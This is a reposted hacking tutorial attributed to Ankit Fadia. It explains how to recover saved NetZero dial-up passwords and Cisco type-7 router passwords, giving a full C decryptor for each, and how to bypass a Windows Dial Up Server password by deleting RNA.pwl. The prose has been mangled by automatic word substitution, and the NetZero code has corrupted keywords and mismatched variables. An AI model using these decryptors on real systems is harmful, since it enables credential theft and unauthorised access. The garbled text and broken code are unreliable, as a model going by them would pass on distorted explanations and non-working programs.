BEST HACKING TIPS BY ANKIT FADIA
Welcome to added edition of Password Cracking Decrypted. In this drill we module learn, you guessed it, how to fissure passwords. In this edition we hit explanations to how to fortuity more kinds of passwords.
Although this drill is quite cushy to understand, I would definitely aforementioned to attain digit suggestion. To genuinely savor datum this manual, you requirement to undergo C relatively well. However, modify if you hit no intent what C is, I verify you that this drill module definitely be of ingest to you.
Cracking the Netzero (Free ISP) Dial Up Password
Today, the sort of cyberspace Service Providers (both liberated and the not so liberated ones) has rattling reached a rattling broad figure. All of them intend at providing meliorate services and making the impact of conjunctive to the cyberspace easier for the user. One ordinary training amongst both cyberspace Service Providers and favourite browsers aforementioned cyberspace Explorer, hit this choice titled ‘Save Password’, which makes chronicle easier for the user, as it allows the individual to not identify in the countersign apiece instance he has to start to the Internet.
Although, aforementioned every another software, as presently as the developer tries to add a individual cordial feature or attain the code easier to ingest or more efficient, he has to attain at small whatever cooperation in the country or country field. One favourite warning would be Outlook Express, ever since the Preview Pane has been introduced within the telecommunicate client, Outlook Express users hit embellish unerect to Email-Borne Viruses.
Anyway, effort backwards to the person of this tutorial, modify including the ‘Save Password’ feature has prefabricated the User’s Password unsafe. Now, what happens is that, when you analyse on this choice or enable it, then the afraid code (Browser or cyberspace Service Provider Software) takes it passes it finished an formula to encrypt it. Once, the Password is encrypted, it is then stored in the Windows Registry or in whatever .ini or .dat or a kindred file. Now, this grouping sounds quite safe, however, if you countenance deeper, then you encounter that it is pain inactivity to happen.
The rattling fact that the encrypted countersign has to be stored somewhere, makes this feature vulnerable. Also, nearly every code providing this feature does not ingest a brawny algorithm. This makes the impact of a coder rattling easy. Some code modify stores the countersign as plaintext in the registry!!! So, essentially the weakest concern in this feature is that most code developers are tired of the fact that the encrypted countersign crapper be easily decrypted, erst we think the code exclusive out. So, what I stingy to feature is that using this feature though sure makes chronicle easy, for those of you who cannot advert passwords, but it does yield your cyberspace Account vulnerable. However, if you are digit of those grouping who needs to indite downbound your countersign on a warning of essay and study it to the face of your monitor, then this feature is definitely for you.
So how do I fissure the Netzero Dial Up Password?
NOTE: The mass aggregation prototypal appeared at L0pht.com I exclusive rewrote it and prefabricated it more understandable.
Anyway, Netzero is a liberated ISP, which asks exclusive for a business forbid in convey for cyberspace Access. It likewise provides this ‘Save Password’ feature, however, it likewise aforementioned most services, uses an extremely anaemic formula to encrypt the password. The mass impact of coding entireness on Netzero edition 3.0 and early and requires Win 9x, NT or Win 2K to be running.
For this exploit, you requirement to hit topical admittance to the machine, which has the Netzero code installed.
This danger cannot be misused unless and until you intend the required file, for that you either hit to hit topical admittance or requirement to devise a method of effort the file, which contains the password.
The Netzero Username and Password are stored in an code start named, id.dat, which is settled in the Netzero directory. If the individual has enabled the ‘Save Password’ option, then the Username and Password are also stored in the jnetz.prop file. The passwords stored in both these files are encrypted using a rattling exclusive cushy to fissure algorithm. Although the algorithms utilised to intend the encrypted aggregation (to be stored in the digit files), are not same, still they are derivative from the aforementioned important algorithm. Both the algorithms dissent rattling slightly. In this drill we module see as to how this anaemic formula crapper be exploited.
The Netzero Password is encrypted using a change code system. The code grouping utilised is a exemplary warning of a 1 to 1 function between characters where apiece azygos plaintext case is replaced by a azygos encrypted character.
Are you lost? Well, to see meliorate feature on.
Say, the Netzero covering is running, and the individual clicks on the ‘Save Password’ choice and types his countersign in the required field. Now, then what happens is that, the Netzero Application loads the encrypting file, which contains the plaintext to cipher-text database into memory. Now, for warning your countersign is xyz and it is stored in positioning ‘m’ of the module and the same encrypted countersign abc is stored in the positioning ‘n’ of the memory, then the countersign xyz actually is stored as abc.
Well it is quite simple, right? Well, almost. The conception of the coding formula utilised by Netzero which is arduous to understand, is that digit encrypted characters change apiece case of the plaintext password. These digit encrypted characters exchange a azygos plaintext character, are still not stored together.
When work case x stored in i of a countersign ‘n’ characters long, the prototypal encrypted case would be stored in ‘i’ and the incoming in ‘n+i.’
The digit encrypted characters are derivative from the mass table:
| 1 a M Q f 7 g T 9 4 L W e 6 y C
————————————-
g | ` a b c d e f g h i j k l m n o
T | p q r s t u v w x y z { | } ~
f | @ A B C D E F G H I J K L M N O
7 | P Q R S T U V W X Y Z [ \ ] ^ _
Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , – . /
NOTE: SP represents a azygos expanse and the above interpret represents code characters.
To encrypt a progress of size ‘n’, we requirement to encounter apiece case in the above plateau and place the article brick into i and locate the bed brick into n+i.
For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg
On the another hand, patch decrypting the countersign of size 2n, then I module be embellish the surroundings in the surroundings in the above plateau where the article is headlike by i and the bed headlike by n+i intersect.
For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc
Decrypting the countersign manually would be quite fun, but would definitely be a rattling instance intense process. Anyhow, I do declare you essay to rewrite the Netzero Password manually atleast once. For those of you, who do not savor decrypting passwords manually, I also hit a C program, which module do it for you.
The mass C information demonstrates how the Netzero Password is decrypted. Simply make and fulfil in the directory in which the jnetz.prop exists.
___________________________________________________________
#include <stdio.h>
#include <string.h>
#define UID_SIZE 64
#define PASS_CIPHER_SIZE 128
#define PASS_PLAIN_SIZE 64
#define BUF_SIZE 256
const burn decTable[6][16] = {
{'`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'},
{'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',0},
{'@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'},
{'P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'},
{'0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'},
{' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'}
};
int nz_decrypt(char cCipherPass[PASS_CIPHER_SIZE],
char cPlainPass[PASS_PLAIN_SIZE])
{
int passLen, i, idx1, idx2;
passLen = strlen(cCipherPass)/2;
if (passLen > PASS_PLAIN_SIZE)
{
printf("Error: Plain book clothing likewise small\n");
return 1;
}
for (i = 0; i < passLen; i++)
{
switch(cCipherPass[i])
{
case '1':
idx2 = 0; break;
case 'a':
idx2 = 1; break;
case 'M':
idx2 = 2; break;
case 'Q':
idx2 = 3; break;
case 'f':
idx2 = 4; break;
case '7':
idx2 = 5; break;
case 'g':
idx2 = 6; break;
case 'T':
idx2 = 7; break;
case '9':
idx2 = 8; break;
case '4':
idx2 = 9; break;
case 'L':
idx2 = 10; break;
case 'W':
idx2 = 11; break;
case 'e':
idx2 = 12; break;
case '6':
idx2 = 13; break;
case 'y':
idx2 = 14; break;
case 'C':
idx2 = 15; break;
default:
printf("Error: Unknown Cipher Text index: %c\n", cCipherPass[i]);
return 1;
break;
}
switch(cCipherPass[i+passLen])
{
case 'g':
idx1 = 0; break;
case 'T':
idx1 = 1; break;
case 'f':
idx1 = 2; break;
case '7':
idx1 = 3; break;
case 'Q':
idx1 = 4; break;
case 'M':
idx1 = 5; break;
default:
printf("Error: Unknown Cipher Text Set: %c\n",
cCipherPass[i+passLen]);
return 1;
break;
}
cPlainPass[i] = decTable[idx1][idx2];
}
cPlainPass[i] = 0;
return 0;
}
int main(void)
{
FILE *hParams;
char cBuffer[BUF_SIZE], cUID[UID_SIZE];
char cCipherPass[PASS_CIPHER_SIZE], cPlainPass[PASS_PLAIN_SIZE];
int finished = 2;
printf("\nNet Zero Password Decryptor\n");
printf("Brian Carrier [bcarrier@atstake.com]\n");
printf("@Stake L0pht Research Labs\n");
printf("http://www.atstake.com\n\n");
if ((hParams = fopen("jnetz.prop","r")) == NULL)
{
printf("Unable to encounter jnetz.prop file\n");
return 1;
}
while ((fgets(cBuffer, BUF_SIZE, hParams) != NULL) && (done > 0))
{
if (strncmp(cBuffer, "ProfUID=", 8) == 0)
{
done–;
strncpy(cUID, cBuffer + 8, UID_SIZE);
printf("UserID: %s", cUID);
}
if (strncmp(cBuffer, "ProfPWD=", 8) == 0)
{
done–;
strncpy(cCipherPass, cBuffer + 8, PASS_CIPHER_SIZE);
printf("Encrypted Password: %s", cCipherPass);
if (nz_decrypt(cCipherPass, cPlainPass) != 0)
return 1;
else
printf("Plain Text Password: %s\n", cPlainPass);
}
}
fclose(hParams);
if (done > 0)
{
printf("Invalid jnetz.prop file\n");
return 1;
} added {
return 0;
}
}
________________________________________________________________
**********************
HACKING TRUTH: By choice Windows accepts both brief and daylong passwords as the Windows login password. Some users ingest extremely brief passwords, which crapper easily be brute forced. So in visit to ordered the peak sort of characters or the peak size of the password, exclusive study the mass registry trick-:
- Launch the Windows Registry Editor i.e. c:\windows\regedit.exe
- Scroll downbound to the mass registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network
- Click on Edit > New DWORD Value.
- Name this newborn DWORD continuance as MinPwdLen and in the accumulation field, start the peak sort of characters the countersign has to be of. One abstract to state here is that this continuance is in Hexadecimal.
- Now, Press F5 and your grouping meet became a tiny taste acquirer but sure not unhackable.
***********************
Cracking CISCO Router Passwords
Cisco Router hacking is thoughtful to be player selected and rattling kewl. It is rattling a enthusiastic training for your wear cells, especially if the direct grouping has Kerberos, a Firewall and whatever another Network Security code installed. Anyway, nearly ever the important causative behindhand effort stem on a grouping is to intend the countersign file. Once you intend the Router countersign file, then you requirement to be healthy to rewrite the encrypted passwords stored by it. Well, in this section, we module see meet that.
The mass is a C information which demonstrates how to rewrite a CISCO password.
_______________________________
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
______________________________
NOTE: The above entireness exclusive on a UNIX platform. If you are streaming Windows, then you module hit to ingest
some brute obligate countersign cracker.
Bypassing the Dial Up Server Password
Those of you who hit utilised File Sharing, staleness sure hit heard most the Dial Up Server code or utility. Now, this likewise crapper be countersign protected. Now, feature you hit countersign fortified the Dial Up Server, and hit irrecoverable it or someone has denaturized it, then no digit crapper selector into your system. What do you do?
Like every countersign endorsement features in Win 9x systems, this likewise crapper easily be bypassed or changed. You do not requirement to undergo the preceding older countersign to action this hack. Simply withdraw the start RNA.pwl start in the c:\windows directory and the incoming instance you ingest Dial Up Server, you module encounter that it module either communicate you to start a newborn countersign or exclusive not communicate for a countersign at all.
Well, that is every for now, I module update this drill explaining how to fissure more passwords rattling rattling soon, so secure in there.
Ankit Fadia
To obtain tutorials on everything you dreamt of cursive by Ankit Fadia tie his transmitting itemize by sending an telecommunicate to: programmingforhackers-subscribe@egroups.com
Categories: Miscellaneous
Tags: database, hack, installation, password, tutorial, tutorials
All the software Downloads are from its publisher sites they are only available in Demo form, torrent files or links from rapidshare.com, yousendit.com or megaupload.com are not allowed. Please do not post any full version or crack, Keygen, or any serial Key. We ban you account for ever.
If this article contain illegal material send the written infringement notice email notifcation to
manzaa@mzworld.com with URL of this article to remove this post or click here to contact us.
Please read DMCA Information before.
Comments
No Comments
Leave a reply
You must be logged in to post a comment.